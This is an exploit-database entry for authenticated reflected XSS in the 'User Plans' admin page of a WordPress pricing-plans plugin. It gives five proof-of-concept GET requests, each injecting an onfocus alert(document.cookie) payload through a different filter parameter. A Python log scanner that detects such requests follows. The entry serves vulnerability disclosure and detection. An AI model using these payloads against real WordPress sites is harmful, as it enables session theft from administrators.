## https://sploitus.com/exploit?id=WPEX-ID:5C902FAC-F9FE-4763-8894-F52ED0D5D4A3
PoC #1 | Authenticated Reflected XSS | User Plans > &filter[id]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D=%22autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%2F%2F&filter%5Buser%5D=&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=&filter%5Bcreated_date%5D=&filter%5Bupdated_date%5D=&paged=1 HTTP/2
Host: example.com


PoC #2 | Authenticated Reflected XSS | User Plans > &filter[user]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D=&filter%5Buser%5D=%22autofocus%3Dautofocus+onfocus%3Dalert%281553%29%3B+%2F%2F&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=&filter%5Bcreated_date%5D=&filter%5Bupdated_date%5D=&paged=1 HTTP/2
Host: example.com


PoC #3 | Authenticated Reflected XSS | User Plans > &filter[expired_date]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter%5Bid%5D&filter%5Buser%5D&filter%5Bplan%5D=all&filter%5Btype%5D=all&filter%5Bstatus%5D=all&filter%5Bpayment_type%5D=all&filter%5Bexpired_date%5D=2021-06-15%22autofocus%3Dautofocus+onfocus%3Dalert%281553%29%3B+%2F%2F&filter%5Bcreated_date%5D&filter%5Bupdated_date%5D&paged=1 HTTP/2
Host: example.com


PoC #4 | Authenticated Reflected XSS | User Plans > &filter[created_date]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter[id]&filter[user]&filter[plan]=all&filter[type]=all&filter[status]=all&filter[payment_type]=all&filter[expired_date]&filter[created_date]=2021-06-15%22autofocus=autofocus%20onfocus=alert(document.cookie);%20//&filter[updated_date]&paged=1 HTTP/2
Host: example.com


PoC #5 | Authenticated Reflected XSS | User Plans > &filter[updated_date]:

GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&_wpnonce=1337&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dstm_pricing_plans%26page%3Dstm_user_plans&filter[id]&filter[user]&filter[plan]=all&filter[type]=all&filter[status]=all&filter[payment_type]=all&filter[expired_date]&filter[created_date]&filter[updated_date]=2021-06-15%22autofocus=autofocus%20onfocus=alert(1553);%20//&paged=1 HTTP/2
Host: example.com
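
One way to look for requests of this shape in web-server access logs, as an added example that is not part of the original entry: it flags `filter[...]` values on the `stm_user_plans` admin page that contain a quote or angle bracket, with or without an `on*=` attribute. The combined-style log format, the function names and the rule that date filters are `YYYY-MM-DD` are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Page slug and parameter shape taken from the PoC requests above.
PAGE = "stm_user_plans"
FILTER_KEY = re.compile(r"^filter\[(\w+)\]$")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"""["'<>]""")             # characters that can close an attribute or tag
HANDLER = re.compile(r"\bon[a-z]+\s*=", re.I)  # onfocus=, onerror=, ...
ISO_DATE = re.compile(r"^\d{4}-\d{2}-\d{2}$")  # assumption: date filters are YYYY-MM-DD

def suspicious_filters(target):
    """Return {filter name: reason} for filter[...] values that look like attribute breakout."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if ("page", PAGE) not in params:
        return {}
    hits = {}
    for key, value in params:  # parse_qsl has already percent-decoded key and value
        m = FILTER_KEY.match(key)
        if not m or not value:
            continue
        name = m.group(1)
        if MARKUP.search(value) and HANDLER.search(value):
            hits[name] = "quote plus event handler"
        elif MARKUP.search(value):
            hits[name] = "markup character"
        elif name.endswith("_date") and not ISO_DATE.match(value):
            hits[name] = "malformed date"
    return hits

def scan(log_lines):
    """Return [(line number, hits)] for access-log lines with a flagged request."""
    found = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        hits = suspicious_filters(m.group(1)) if m else {}
        if hits:
            found.append((n, hits))
    return found

# Constructed sample lines (not real traffic): one benign, two flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jun/2021:10:00:00 +0000] "GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&filter%5Bid%5D=42&filter%5Bexpired_date%5D=2021-06-15 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Jun/2021:10:00:05 +0000] "GET /wp-admin/edit.php?post_type=stm_pricing_plans&page=stm_user_plans&filter%5Bid%5D=%22autofocus%3Dautofocus+onfocus%3Dx HTTP/1.1" 200 5130',
    '203.0.113.7 - - [15/Jun/2021:10:00:09 +0000] "GET /wp-admin/edit.php?page=stm_user_plans&filter[created_date]=2021-06-15%22x HTTP/2" 200 5125',
]
```

`scan(SAMPLE_LOG)` returns the second and third lines with the offending filter name and reason; both the percent-encoded and the raw-bracket parameter spellings used in the requests above are handled because matching happens after decoding.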